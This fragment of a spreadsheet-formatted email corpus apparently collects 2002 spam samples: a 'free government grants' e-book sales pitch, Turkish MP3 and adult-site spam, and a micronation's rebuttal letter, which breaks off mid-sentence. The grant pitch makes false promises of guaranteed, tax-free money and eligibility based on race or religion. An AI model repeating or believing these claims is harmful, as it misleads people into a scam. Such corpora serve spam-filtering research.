------=_NextPart_864650872074--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http://terra.es http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5520</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: danet@earthlink.net\nDate: Thu, 25 Jul 2002 14:31:23 -1000</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 14:31:23 -1000</t>
  </si>
  <si>
    <t>danet@earthlink.net</t>
  </si>
  <si>
    <t>\n\n#  **  Free Personal and Business Grants**\n\n\n\n##  " Qualify for _at least_ $25,000 in free grants money - Guaranteed! "  \n  \n---  \n  \n###  Each day over One Million Dollars in Free Government  \nGrants  is given away to people just like you for a wide  \nvariety of Business And Personal Needs\n\n        Dear Grant Seeker,\n\n&gt; In a moment, I'll tell you exactly **HOW &amp; WHERE** to get Grants. This\n&gt; **MONEY** has to be given away, **WHY** not to **YOU?**\n\n&gt; You may be thinking, "How can I get some of this Free Grants Money"\n\n&gt; Maybe you think it's impossible to get free money?\n\n&gt; Let me tell you it's not impossible! It's a fact, ordinary people and\n&gt; businesses all across the United States are receiving millions of dollars\n&gt; from these Government and Private Foundation's everyday.\n\n&gt; Who Can Apply?\n\n&gt; **ANYONE** can apply for a Grant from 18 years old and up!\n\n&gt; Grants from $500.00 to $50,000.00 are possible! **GRANTS** don't have to be\n&gt; paid back, **EVER!** Claim your slice of the **FREE** American Pie.\n\n&gt; This money is not a loan, Trying to get money through a conventional bank\n&gt; can be very time consuming and requires a lot of paperwork, only to find out\n&gt; that you've been denied. These Government Agencies don't have to operate\n&gt; under the same stringent requirements that banks do.\n\n&gt; You decide how much money you need, as long as it's a lawful amount and\n&gt; meets with the Government Agencies criteria, the money is yours to keep and\n&gt; never has to be repaid. This money is non taxable &amp; interest free.\n\n&gt; None of these programs require a credit check, collateral, security deposits\n&gt; or co-signers, you can apply even if you have a bankruptcy or bad credit, it\n&gt; doesn't matter, you as a tax payer and U.S. citizen are entitled to this\n&gt; money.\n\n&gt; There are currently over 1,400 Federal Programs, 24,000 State Programs,\n&gt; 30,000 Private Foundations and 20,000 Scholarship Programs available.\n\n&gt; This year over $30 Billion Dollars In Free personal and business Government\n&gt; Grants Money will be given away by Government Grants Agencies.\n\n  \n\n\n###  **Government Personal and Business Grants Facts:**\n\n**Over 20 Million People Get Government Money Every Year:**\n\n1,000,000 entrepreneurs get money to start or expand a business\n\n4,000,000 people get money to invest in real estate\n\n6,000,000 people get money to go to college\n\n10,000,000 people get free help and training for a better job\n\n  \n---  \n  \n##  **Getting Business Grants**\n\n&gt; Anyone thinking about going into business for themselves, or wanting to\n&gt; expand an existing business should rush for the world's largest "one-stop-\n&gt; money-shop" where FREE business grants to start or expand a business is\n&gt; being held for you by the Federal Government.\n\nIt sounds absolutely incredible that people living right here in the United\nStates of America wouldn't know that each year the world's largest source of\nfree business help delivers:\n\nOver $30 billion dollars in free business grants and low-interest loans;\n\nover one-half trillion dollars in procurement contracts; and\n\nover $32 billion dollars in FREE consulting and research grants.\n\n&gt; With an economy that remains unpredictable, and a need for even greater\n&gt; economic development on all fronts, the federal government is more willing\n&gt; than it ever has been before to give you the money you need to own your own\n&gt; business and become your own boss!\n\nIn spite of the perception that people should not look to the government for\nhelp, the great government give-away programs have remained so incredibly huge\nthat if each of the approximately 8 million businesses applied for an equal\nshare, they would each receive over $70,000.\n\nMost people never apply for FREE Business Grants because they somehow feel it\nisn't for them, feel there's too much red-tape, or simply don't know who to\ncontact.The fact is, however, that people from all walks of life do receive\nFREE GRANTS MONEY and other benefits from the government, and you should also.\n\n##  **Government Grants for Personal Need**\n\n&gt; Help to buy a new home for low income families, repair your home, rent,\n&gt; mortgage payments, utility bills, purchase a new car, groceries, childcare,\n&gt; fuel, general living expenses, academic tutoring, clothing, school supplies,\n&gt; housing assistance, legal services, summer camp, debts, music lessons, art\n&gt; lessons, any extracurricular activities, pay bills for senior citizens, real\n&gt; estate taxes, medical expenses and general welfare. If you or someone you\n&gt; know suffered a fire lose there are programs available to help in replacing\n&gt; necessities.\n\n##  Scholarships And Grants For Education\n\n&gt; Grant Money for preschool children and nursery school education, private,\n&gt; primary and secondary schools, men and women to further their education,\n&gt; scholarships for athlete's, business management, engineering, computer\n&gt; science, medical school, undergraduate, graduate, professional, foreign\n&gt; studies and many more.\n\n###  **Here's How You Can Get Free Grants  \nIn The Shortest Time Possible**\n\n&gt; Once you know how and where to apply for a specific Free Grant, results are\n&gt; almost inevitable. The government wants to give away this money. . . it is\n&gt; under congressional mandate to do so! These funds are made available to help\n&gt; you, the tax payer. All that's required from you is the proper presentation\n&gt; of your grant request. That's all.\n\nAnnouncing...\n\n###  **"The Complete Guide To Government Grants"**\n\n&gt; Forget just about everything you've seen or heard about government grants.\n&gt; What I've done is put together a complete blueprint for researching,\n&gt; locating and obtaining government grants. "The Complete Guide To Government\n&gt; Grants" is the most comprehensive tool for obtaining free grant money, and\n&gt; it comes in an Electronic book  \n&gt; (e-book) format, meaning you can download and start using it minutes after\n&gt; you order.\n\n&gt; The Complete Guide to Government Grants will provide you with access to\n&gt; thousands of grant and loan sources, with step by step instructions to\n&gt; proposal writing and contact procedures.\n\nIn the Complete Guide to Government Grants you'll find:\n\n&gt; Step by step guidelines to applying for government grants\n\n&gt; Direct access to over 1,400 grant, loan and assistance programs offered by\n&gt; the U.S. federal government. All you need to do is Click &amp; Find your program\n&gt; from the detailed categorized listings\n\n&gt; Direct access to thousands of resources of state specific grant programs\n\n&gt; Name, phone number and address of an expert in your state that will answer\n&gt; your grant related questions and help you with the grant application... free\n&gt; of charge\n\n&gt; Online directory of government supported venture capital firms\n\n&gt; A unique search tool that will allow you to generate a customized listing of\n&gt; recently announced grant programs\n\n&gt; Government funding programs for small businesses\n\n&gt; Top 100 government programs (based on number of inquiries), discover what\n&gt; are the most sought after government grants and assistant programs. Claim\n&gt; your slice of the **FREE** American Pie\n\n&gt; Online Directory of federal and state resources for government scholarships\n&gt; and grants for education\n\n&gt; Step by step guidelines to locating grants, loans and assistant programs for\n&gt; starting a new business or expanding an existing one\n\n&gt; How to get free small business counseling and expert advice courtesy of the\n&gt; US government\n\n&gt; Government grants application forms\n\n&gt; Direct access to thousands of government grants programs covering: small\n&gt; businesses, home improvement, home buying and homeownership, land\n&gt; acquisition, site preparation for housing, health, assistance and services\n&gt; for the unemployed, job training, federal employment, education, and much\n&gt; much more\n\n&gt; How to develop and write grant proposals that get results\n\n&gt; ...Plus much more\n\n**The Complete Guide to Government Grants is so comprehensive, it provides you\nwith direct access to practically every source of FREE government grants money\ncurrently available.**\n\n&gt; If you're an American citizen or resident, you are entitled to free grant\n&gt; money ranging from $500 to $250,000 or more. If you are Black you have\n&gt; already qualified for 15 programs, being Hispanic, you qualify for many\n&gt; programs. Being a Christian will get you into 20 programs, there are also\n&gt; many other programs available for different faiths, Jewish, Catholic. Not\n&gt; having any money, will get you into over 30 programs, 550 programs if you\n&gt; are unemployed, or underemployed. The list and sources are endless.\n\n&gt; You Are Eligible! This money is Absolutely Free and will be yours to use for\n&gt; any worthwhile purpose.\n\n&gt; Did you know you can apply for as many grants as you want?\n\n&gt; It's true, For instance, you could get a $65,000 grant to begin a weight\n&gt; loss business, get $8,800 in tuition to become a nurse or $35,000 to open up\n&gt; the day-care center, you've always dreamed of owning. And then, go out and\n&gt; apply for a grant to buy a home for you and your family. And once your new\n&gt; business starts doing well you could go out and get another grant for\n&gt; expansion of your business. The possibilities are endless.\n\n  \n\n\n###  You Must Qualify For _At Least_ $25,000 In Free  \nGrants Money, Or Your Money Back!\n\n&gt; We are so confident in our Grants Guide that If you have not received at\n&gt; least $25,000 in free grant money, or, if you are unhappy with our e-book\n&gt; for any reason within the next 12 months, Just send the e-book back and we\n&gt; will refund your entire payment. NO QUESTIONS ASKED!!\n\n&gt; If you want to order, we insist you do so entirely at our risk. That is why\n&gt; the E-book comes with a... **No Risk full year Money-Back Guarantee**. There\n&gt; is absolutely NO RISK on your part with this 365 day guarantee. What we mean\n&gt; is we want you to order without feeling you might "get taken."\n\n&gt; Therefore, we want you to order this material today... read it, use it...\n&gt; and if for any reason you aren't completely satisfied, you not only can\n&gt; cancel, **you should** , for an immediate refund of your purchase price. You\n&gt; simply can't lose.\n\n&gt; **Free Bonuses**\n\n&gt; Just to "sweeten" the deal, I'll include the following **four valuable\n&gt; bonuses** , that you can keep as a gift, even if you later decide not to\n&gt; keep the Grants Guide!\n\n&gt; **Free Bonus #1:**\n\n&gt; **A Fully Featured Grants Writing Tutorial Software Package**\n\n&gt; **THIS INFO ALONE IS WORTH THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN\n&gt; PURCHASE A GRANTS CD OR INFO ANYWHERE, AND YOU WILL NOT RECEIVE THIS\n&gt; DOWNLOADABLE SOFTWARE THAT ACTUALLY SHOWS YOU HOW TO APPLY AND WHAT TO SAY,\n&gt; SO THAT YOU ARE ACCEPTED FOR A GRANT !!!**\n\n&gt; This interactive software tool will walk you through the grant-writing\n&gt; process and will teach you everything you need to know to write competitive\n&gt; grants proposals.\n\n&gt; The program includes:\n\n&gt; detailed information and tips on writing grants proposals;\n\n&gt; how to complete a grant application package;\n\n&gt; examples of good, complete grant packages;\n\n&gt; a glossary of grants terms;\n\n&gt; resources and contacts;\n\n&gt; a mock grants-writing activity where you will be able to compare your\n&gt; results to a successful grant application\n\n&gt; plus much much more\n\n&gt; **Free Bonus #2:**\n\n&gt; **The Insider Information Report: 61 Ways To Save Money**\n\n&gt; This valuable special report contains insider experts tips and techniques\n&gt; that will help you to save thousands of Dollars. You'll discover little\n&gt; known secrets and tricks to saving money on airline fares, car rental, new\n&gt; and used car buying, auto leasing, gasoline, car repairs, auto insurance,\n&gt; life insurance, savings and investment, credit cards, home equity loans,\n&gt; home purchase, major appliances, home heating, telephone services, food\n&gt; purchase, prescription drugs and more.\n\n&gt; **Free Bonus #3:**\n\n&gt; **The Complete Guide To Starting Your Own Business**\n\n&gt; A comprehensive manual that will give you all the guidelines and tools you\n&gt; need to start and succeed in a business of your own, packed with guides,\n&gt; forms, worksheets and checklists. You will be amazed at how simple these\n&gt; strategies and concepts are and how easy it will be for you to apply them to\n&gt; your own business idea. Hundreds were sold separately at $40 each... you get\n&gt; it here for free.\n\n&gt; Here's just a taste of what's in the guide:\n\n&gt; How to determine the feasibility of your business idea. A complete fill in\n&gt; the blanks template system that will help you predict problems before they\n&gt; happen and keep you from losing your shirt on dog business ideas.\n\n&gt; A step by step explanation of how to develop a business plan that will make\n&gt; bankers, prospective partners and investors line up at your door. Plus, a\n&gt; complete ready made business plan template you can easily adapt to your\n&gt; exact needs.\n\n&gt; Discover the easiest, simplest ways to find new products for your business\n&gt; that people are anxious to buy.\n\n&gt; How to make money with your new idea or invention. Secrets of making sure\n&gt; you put cash in your pocket on your very first idea business venture.\n\n&gt; Complete, step by step instructions on how to plan and start a new business.\n&gt; This is must-know must-do information; ignore it and you stand a good chance\n&gt; to fail. You get specifically designed instructions for each of the\n&gt; following: a service business, a retail store, a home based business, a\n&gt; manufacturing company, and more.\n\n&gt; What nobody ever told you about raising venture capital money. Insider\n&gt; secrets of attracting investors, how to best construct your proposal, common\n&gt; mistakes and traps to avoid, and much more.\n\n&gt; Checklist for entering into a partnership. Keeps you from costly mistakes\n&gt; when forming a partnership.\n\n&gt; How to select a franchise business. A step by step guide to selecting a\n&gt; franchise that is best for you.\n\n&gt; A complete step-by-step organized program for cutting costs in your\n&gt; business. Clients of mine have achieved an average of 28% to 35% cost\n&gt; reduction with this technique, and you can too. Keep the money in your\n&gt; pocket with this one!\n\n&gt; What are the secrets behind constructing a results driven marketing plan? I\n&gt; will lead you step by step into developing a marketing plan that will drive\n&gt; your sales through the roof.\n\n&gt; A complete step by step guide guaranteed to help you increase your profits\n&gt; by up to 64%, I call it "The Profit Planning Guide". This is a simple,\n&gt; practical, common sense strategy, but amazingly enough, almost no one\n&gt; understands or uses it.\n\n&gt; **Free Bonus #4:**\n\n&gt; **Guide To Home Business Success**\n\n&gt; This is a fast, no-frills guide to starting and succeeding in a home based\n&gt; business. Here's just a taste of what's in the guide:\n\n&gt; Home business: is it for you?\n\n&gt; What are the secrets behind the people who have million dollar home based\n&gt; businesses? you'll find a 24 tip list proven to turn your home business into\n&gt; a money machine.\n\n&gt; Laws and regulations you must be aware of to avoid legal errors.\n\n&gt; Planning a home based business **-** Insider secrets and tips revealed for\n&gt; ensuring your success in a home business.\n\n&gt; Fundamentals of home business financial planning.\n\n&gt; Simple, easy to copy ideas that will enhance your image - and the response\n&gt; you get from your customers.\n\n&gt; Common problems in starting and managing a home based  business - and how to\n&gt; solve them once and for all.\n\n**Who I Am and Why I'm Qualified to Give**  \n**You The Best Grants Advice Available**\n\n&gt; I'm the president of a leading Internet based information business. I'm also\n&gt; the creator of "The Managing a Small Business CD-ROM" and the author of five\n&gt; books.\n\n&gt; I've been involved in obtaining grants and in small business for the past 23\n&gt; years of my life, as a business coach, a manager of a consulting firm, a\n&gt; seminar leader and as the owner of five successful businesses.\n\n&gt; During my career as a business coach and consultant I've helped dozens of\n&gt; business owners obtain government grants, start their businesses, market,\n&gt; expand, get out of troubles, sell their businesses and do practically every\n&gt; other small business activity you can think of.\n\n&gt; The Guide presented here contains every tip, trick, technique and strategy\n&gt; I've learned during my 23 year career. You practically get my whole brain in\n&gt; a form of an E-book.\n\n**How the Grants Guide is priced?**\n\n&gt; **The Complete Guide To Government Grants** is normally priced at $50,\n&gt; but...\n\n&gt; ... as part of an Online marketing test, if you purchase from this sale you\n&gt; pay only $19.99 (that's 75% off ...plus, you still get the FREE valuable\n&gt; bonuses.)\n\n&gt; **If you are serious about obtaining free grants money, you _need_ this\n&gt; guide. Don't delay a moment longer. Order Now !!! **\n\n**P.S.** The Complete Guide To Government Grants will make a huge difference.\nYou risk nothing. The guide is not the original price of $50, but only $19.99\n( _if you purchase through this sale_ ) and comes with a one year money back\nguarantee. And you get four valuable free bonuses which you may keep\nregardless. Don't delay a moment longer, ORDER NOW !!!!  \n\n\nShipping and Handling is **FREE** since we will email you all of this info via\naccess to our secure website which contains everything described above.  \n\n* * *\n\n Order Now!!! If above link doesn't work, Click Here  \n---  \n  \n  \n  2394YTyQ5-342YskU3943ol21 \--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499</t>
  </si>
  <si>
    <t>To: &lt;sitescooper-talk@example.sourceforge.net&gt;\nFrom: Alper NURdogan &lt;bfebyivif@kolaymail.com&gt;\nDate: Thu, 25 Jul 2002 12:58:17 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:58:17 -0400</t>
  </si>
  <si>
    <t>Alper NURdogan &lt;bfebyivif@kolaymail.com&gt;</t>
  </si>
  <si>
    <t>[scoop] Muzik iste</t>
  </si>
  <si>
    <t>JetMp3 Trkiye'de ilk kez uygulanan bir sistemi hayata geirdi.\n[URL]http://www.jetmp3.com[/URL]\nBu sistemle artk stediiniz MP3 leri ister tek tek isterseniz albmler halinde ve birka dakika iinde sanki disketten bilgisayarnza ykler gibi sratle indirebilirsiniz. Turk ve Yabanc albmler, klipler ve daha fazlas...\n11gb lik arivimize gz atmak iin tklayn: [URL]http://www.jetmp3.com[/URL]\n\n\n\nÆ_x0004_+,µ_x0007_X'u%zÅ_x0004_(W-0x+y)rxj(_x0006_ejoâ- )]'_x0006__x001B_m_x000C_z_x0007_o)_x001C_^ZIXX(z(¥_x0005_bq_x0007_all.ß_x0001__x001E_wXb?+^(d"</t>
  </si>
  <si>
    <t>http://www.jetmp3.com http://www.jetmp3.com</t>
  </si>
  <si>
    <t>5503</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: fork@spamassassin.taint.org\nDate: Thu, 25 Jul 2002 12:57:14 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:57:14 -0500</t>
  </si>
  <si>
    <t>Free Adult.. No Charges!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_205_23557566705631860586663641 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable **** CELEBRITIES EXPOSED  ****    Jennifer Love Huitt Gets BareNaked!  J-LO Takes Some "Puffy"      No Credit Cards, No Checks  IT'S FREE!   [URL]http://www.free-celebhardcore.com[/URL] ------=_NextPart_205_23557566705631860586663641 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ad2 CELEBRITIES EXPOSED    Jennifer Love Huitt Gets BareNaked! J-LO Takes Some = "Puffy"    No Credit Cards, No = Checks    IT'S FREE!   CLICK HERE   =  = This email was sent to you by CelebX Mailing Service using verify-send technology.  Your email address is automatically inserted into the To and From headers of this email to eliminate undeliverable emails and excessive net traffic.  If you wish to be removed from this mailing, please use our removal link here ------=_NextPart_205_23557566705631860586663641-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.free-celebhardcore.com http://xent.com</t>
  </si>
  <si>
    <t>5516</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: enenkio@webtv.net (Robert Moore)\nDate: Thu, 25 Jul 2002 12:23:18 -1000 (HST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:23:18 -1000 (HST)</t>
  </si>
  <si>
    <t>enenkio@webtv.net (Robert Moore)</t>
  </si>
  <si>
    <t>HAWAI`I &amp; ENENKIO KINGDOMS  AMERICANS SHAME !</t>
  </si>
  <si>
    <t>Reply From EnenKio\nThe following message was recieved Saturday, 13 July 2002.=20\nNothing has been amdended or changed. I hold no responcibility for the\ncontent of this message.=20\n=20\nSubject: EnenKio truth (Answers)=20\nDate: Sat, 13 Jul 2002 23:51 EST=20\nFrom: enenkio@webtv.net (Robert Moore)=20\nTo:microfreedom@netscape.net=20\n"EnenKio truth (Answers)"=20\n- News Archives -\nPREVIOUS NEWS RELEASES AND ANNOUNCEMENTS\nJuly 28, 1999: Replies to Asia Times\nJuly 22, 1999: News Release - Gold Bonds\nJune 4, 1999: Replies to Published Articles\nJune 3, 1999: Replies to Published Articles\nJune 2, 1999: Replies to Published Articles\nJune 1, 1999: News Release, Reply to RMI, Part 1\nJune 1, 1999: News Release, Reply to RMI Part 2\nMarch 16, 1999: News Release, Selection of Second Monarch\nMarch 1999 -- MoFA Comments on "State of War"\nDecember 19, 1998: News Release, Death of First Monarch\nJuly 14, 1998: Communiqu=C3=A9, Replies to False Claims\nMay 4, 1997: News Release, Gold Stamps\nMarch 31, 1997: News Release, Declaration of existence of a virtual\n"State of War"\nFebruary 6, 1995: News Release, Setting the Record Straight\nNovember 21, 1994: News Release, Declaration of Claim &amp; Demand for\nPayment\nRETURN TO NEWS\nPrevious News Releases and Announcements\nTheir statements are set forth in italicized orange type; our replies\nare in black type.\nJune 4, 1999- Sirs: The following text was located on a site written or\nplaced by you or under your control:\n"DOM is located on Karitane Island and now includes the Taongi Atoll in\nthe Northern Atolls of the Marshall Islands in the South Pacific 1000\nmiles south of Tahiti. However, the Marshall Islands government has\ncondemned the "fraudulent assertions" of two organizations, namely the\nDOM and sister nation, the Kingdom of EnenKio (the Marshallese name for\nWake Island), claiming to represent the mid-Pacific nation amid an\nalleged investment scam according to an article in Agence France-\nPresse. The Marshall Islands foreign ministry has issued warnings to\ncountries against acknowledging any fraudulent claims made by\nrepresentatives of either nation."\n"A Honolulu-based attorney created the "Kingdom of EnenKio" in the early\n1990s. It was based on a power of attorney agreement with Marshall\nIslands paramount chief Mursel Hermios, which granted the attorney broad\npowers to act on his behalf. The Marshall Islands High Court has ruled\nthe agreement invalid and ordered it nullified, which the "kingdom" has\ndisputed." [URL]http://www.goldhaven.com[/URL] (disconnected as of\n2/1/00)\nThe purpose of this letter is lodge a formal request for correction of\nfalse and misleading statements made by the author regarding the Kingdom\nof EnenKio. While I am pleased to find you have apparently taken a\nserious interest in the Kingdom of EnenKio, I am aghast at how\ndistorted, erroneous and misleading the article is. As a consequence of\nmy service to His Majesty King Remios and the people of EnenKio, I am\nobligated to respond to incidents such as this. I will respectfully\noffer the following line by line correction. For your convenience, your\ntext will be set off (with "**") in color:\n**DOM is located on Karitane Island and now includes the Taongi Atoll in\nthe Northern Atolls of the Marshall Islands in the South Pacific 1000\nmiles south of Tahiti.**\n(Comment: The construction of this statement implies the Marshall\nIslands are in the South Pacific Ocean 1000 miles south of Tahiti, in\nwhich case a reader may be misled.)\nCorrection: DOM is located on Karitane Island in the South Pacific, 1000\nmiles south of Tahiti, and now includes Taongi Atoll in the Northern\nAtolls of the Marshall Islands in the North Pacific.\n**However, the Marshall Islands government has condemned the "fraudulent\nassertions" of two organizations, ...**\n(Comment: Just because the RMI government "...has condemned the\n'fraudulent assertions' ...of ...EnenKio...", does that make it true?\nWhy would you want to quote anything from a government that has been\ninternationally criticized [and documented] time and again for fraud,\nabuse of human rights, outright theft and is in default on almost every\nfinancial obligation it has ever made? What purpose do you propose to\nserve by attacking a concerned group of dedicated people fighting for\nthe very lives of Marshallese natives who have been overrun by foreign\ninvaders, bathed in radiation from nuclear fallout and abused by their\nown corrupt government?)\n**...namely the DOM and sister nation, the Kingdom of EnenKio (the\nMarshallese name for Wake Island),...**\n(Comment: Nothing could be further from the truth. we cannot speak for\nDOM, but as for the Kingdom, we don't even know what being a "sister\nnation" means and for you to make this categorically false statement is\nnot only a blatant sign of ignorance of the state of EnenKio, it is a\ndeceptive intrusion upon the sovereign, His Majesty King Remios, the\nsovereign of EnenKio and Eneen-Kio Atoll, and an inexplicable and\nirresponsible abuse of journalism. Doesn't anybody check sources\nanymore?)\nCorrection: The Kingdom of EnenKio is an independent sovereign state and\nthe same could be said for DOM.\n**...claiming to represent the mid-Pacific nation amid an alleged\ninvestment scam according to an article in Agence France- Presse.**\n(Comment: The government of the Kingdom of EnenKio represents the people\nof EnenKio, who are forced to live in exile from Eneen-Kio Atoll, lands\nand seas that played a significant role in Marshallese culture for\nperhaps 2000 years. Furthermore, "...an article in Agence France-Presse"\nhas no merit as it was authored by a source in the Marshall Islands\ngovernment. My preceding comments apply. The Kingdom of EnenKio is not\nnow and never has been engaged in an "...investment scam...". We have\ntried for many years to attract qualified investors and funding sources\nfor programs that will not only benefit the people of EnenKio, but also\nwill positively impact people around the globe. In fact, we are\ncurrently working with a former NASA Astronaut. One tool scammers have\nin their arsenal is to discredit visionary programs of legitimate\nentities so they can feed on carcasses of the ignorant. Many journalists\nuse the same technique to sell their stories on sensationalism. Doesn't\nanybody check sources anymore?)\n**The Marshall Islands foreign ministry has issued warnings to countries\nagainst acknowledging any fraudulent claims made by representatives of\neither nation.**\n(Comment: The Kingdom of EnenKio has made no "fraudulent claims" of\nwhich I am aware, and in my post, I am responsible for all published\ninformation. I would personally caution any "..countries against\nacknowledging any fraudulent claims made by representatives of..."\nnations, companies or publications if I had credible proof to that\neffect. However, my preceding comments apply as to credibility of any\nRMI ministry source. Furthermore, the RMI has repeatedly attacked the\ncredibility of His Majesty King Hermios, who happens to be the ancestral\nsovereign owner under Marshallese custom of over 1/3 of the land in the\nMarshall Islands, including recent attempts to sequester him against his\nwill. We believe some officials in the RMI are afraid of what will\nhappen to them if honesty and integrity returns to the administration of\nlands and programs to assist the people with their pressing needs and\nthey no longer have their hands on the till. To perpetrate their\njaundiced agenda is an irresponsible abuse of journalism.)\n**A Honolulu-based attorney created the "Kingdom of EnenKio" in the\nearly 1990s.**\n(Comment: Mr. Moore is not an Attorney, though he was living in Honolulu\nin the early 1990s.)\nCorrection: The Kingdom of EnenKio was established by decree of the\nowner of Eneen-Kio Atoll [a.k.a. Enen-kio, Halcyon, Disclerta, Wake and\n6-8 other names], Iroijlaplap Murjel Hermios, who then was Paramount\nChief of the Northern Ratak atolls [he passed away in December 1998] and\nwas fully recognized by the RMI government. He declared the sovereign\nstate of EnenKio in 1994, whereupon the people chose him as their King\nover Eneen-Kio Atoll, ratified the Constitution and established\ngovernment as a limited constitutional monarchy.\n**It was based on a power of attorney agreement with Marshall Islands\nparamount chief Mursel (sic) Hermios, which granted the attorney broad\npowers to act on his behalf.**\nCorrection: The establishment of the Kingdom of EnenKio was made\npossible by Murjel's appointment of Mr. Robert Moore, the adopted\nbrother of Hermios, Alab of Taongi Atoll and a private citizen, to the\npost of Minister Plenipotentiary. The document of appointment was also a\nSpecial Power of Attorney which granted Mr. Moore very specific\ninstructions to do whatever was possible to expel the United States from\nEneen-Kio Atoll and establish an independent state on Hermios' and the\npeople's behalf.\n**The Marshall Islands High Court has ruled the agreement invalid and\nordered it nullified, which the "kingdom" has disputed.**\n(Comment: Since when is a Special Power of Attorney an "agreement"? The\nMarshall Islands High Court has no record or knowledge of the Special\nPower of Attorney, except as has been publicized by the Kingdom of\nEnenKio, and certainly exercises no jurisdiction over Eneen-Kio Atoll,\nwhich lies over 100 miles north of lawful RMI boundaries. The RMI has no\npolitical or territorial jurisdiction over the islands and seas of\nEneen-Kio Atoll because the atoll, by any name you choose, was not\nincorporated into the RMI when it formed its government in 1979, nor was\nit subsequently incorporated by any act, law, mandate or otherwise of\nany present or former Iroijlaplap or Monarch of Eneen-Kio and any\nstatement to the contrary is false, fraudulent and irresponsible.)\nFinally, I suggest you, as a journalist or publisher, do a little more\nresearch, not only into establishment and development of the Kingdom of\nEnenKio, but into the prehistoric history and more recent U.S. invasion\nof Eneen-Kio Atoll, properly named by 'Marshallese' centuries before\narrival of colonial western powers and missionaries. Then I invite you\nto our Embassy in Honolulu to review the public files and documents\nmentioned above, all of which exist in hard copy (not in 'cyberspace')\nand most of which are referenced or published at our official web site.\nBe sure to view the documents at our Resource Center which show, in many\ncases, full-color digitized letters of correspondence with the 59 or so\nstates in the world, many of which are first world. In closing, I would\nsimply appeal to your presumed sense of morality and ethics and request\nthe referenced article be amended or corrected and , if corrected\nelsewhere, that a link be provided to the relevant paragraph cited above\nin the article.\nSKIP TO NEXT FILE =A0TOP OF PAGE\nJune 3, 1999- Sir: The following report was sent to me in which the\nauthor mentions the Kingdom of EnenKio (thank you for spelling 'EnenKio'\ncorrectly. The purpose of this letter below is to lodge a formal request\nfor correction of false and misleading statements made by the author\nregarding the Kingdom of EnenKio.\n"Fantasy Island" -- "Melchizedek passport scam reveals how the Internet\ncan take fraud to new frontiers" By Bertil Lintner in Bangkok, December\n10, 1998: "Determined not to give up, Pedley moved his fictional nation\nonce again, this time to Taongi atoll in the Western Pacific. According\nto a Melchizedek press release, posted on its home page, Taongi was\nleased in 1997 under a treaty with representatives of "the kingdom of\nEnenKio," another only-in- cyberspace country, which in this case claims\nthe U.S.-held Wake Island. In real life, Taongi is an uninhabited atoll\nin the Marshall Islands."\n[URL]http://www.feer.com[/URL] (link to article\nof December 24, 1998: "Fantasy Island", disconnected as of 2/1/00)\nResponse to the author: I am unable to locate the "Melchizedek press\nrelease" you cited, indicating that "...Taongi was leased in 1997 under\na treaty with representatives of "the kingdom of EnenKio,...". Such an\nact would be impossible and implausible as EnenKio has no legal\nauthority or political jurisdiction over Taongi Atoll in the Marshall\nIslands. Further more, Melchizedek (DOM) is not so uninformed as to\npublicly advertise an illegal act in the midst of attempting to find a\nsuitable land base for its people to administer their form of\ngovernment.\nThe Kingdom of EnenKio did enter into a treaty with DOM on the 19th day\nof September, 1997, but it did not convey a lease of land. It declared a\nstate of peace and established diplomatic recognition between our\ngovernments. However, a prior agreement, signed in May 1997, which had\nnothing to do with the Kingdom of EnenKio, transferred Mr. Robert\nMoore's rights to develop Taongi from Mr. Moore to DOM. It did not\nconvey a lease at that time and no such document is in existence.\nThis was made possible because Mr. Moore is the Alab (one class of\nlandowner) of Taongi and had a legal power of attorney pertaining to\nTaongi Atoll, from the principal landowner, Iroijlaplap (Paramount\nChief) Murjel Hermios, who was aware of and supported the transaction.\nConsideration, if any, under the agreement was personally retained by\nMr. Moore, who is also the adopted brother of Hermios.\nNow, please understand, that while Mr. Moore was acting in the latter\ncase on his own behalf, and that of the future use and development of\nTaongi, which would have generated an income to Iroijlaplap Hermios, Mr.\nMoore wears another hat as Minister Plenipotentiary of the Kingdom of\nEnenKio. Iroijlaplap Hermios, also wore (he died in December 10, 1998,\nthe same date of your article) other hats: one as First Monarch, King of\nthe Kingdom of EnenKio and one as owner in allodium of Eneen-Kio Atoll\n(a.k.a. Enen-kio, Halcyon, Disclerta, Wake and several other names).\nFor you to state the Kingdom of EnenKio is "...another only-in-\ncyberspace country...", as you did in the above article, is not only a\ncompletely and categorically false statement, but it is a blatant sign\nof ignorance of the state of EnenKio. And, it is a blatant deceptive\nintrusion upon His Majesty King Hermios, the sovereign of EnenKio and\nEneen-Kio Atoll, and an inexplicable and irresponsible abuse of your\njournalistic license -- unless, of course, your statement could be\nproved accurate.\nI suggest you do a little more research, not only into the establishment\nand development of the Kingdom of EnenKio, but into the prehistoric\nhistory and more recent U.S. invasion of Eneen-Kio Atoll, properly named\nby 'Marshallese' centuries before arrival of colonial western powers and\nmissionaries. Then I invite you to our Embassy in Honolulu to review the\npublic files, all of which exist in hard copy (not 'cyberspace') and\nmost of which are referenced or published at our official web address:\nBe sure to view the documents at our Resource Center which show, in many\ncases, full-color digitized letters of correspondence with the 59 or so\nstates in the world, many of which are first world. In closing, I would\nsimply appeal to your presumed sense of morality and ethics and request\nthe referenced article be amended or corrected and that the link be\nadded to the relevant paragraph cited above in the article.\nSKIP TO NEXT FILE =A0TOP OF PAGE\nJune 2, 1999- Sir: The following statement (in quotes) was copied from\none of your Footnotes to History -D and E (disconnected as of 12/1/00).\n"Enenkio Atoll- In 1898, the United States annexed Wake Island, in the\nMarshall Islands of the western Pacific. After the Marshalls became a\nU.S. Trust Territory, the traditional chiefs of the area agitated for\nrecognition that Wake Island was a part of the Marianas chain, and\npressed their historical claims to the atoll, called Enenkio locally.\nThe U.S. government has consistently ignored these claims. The protests\ntook a sharper turn after the U.S. Congress in 1993 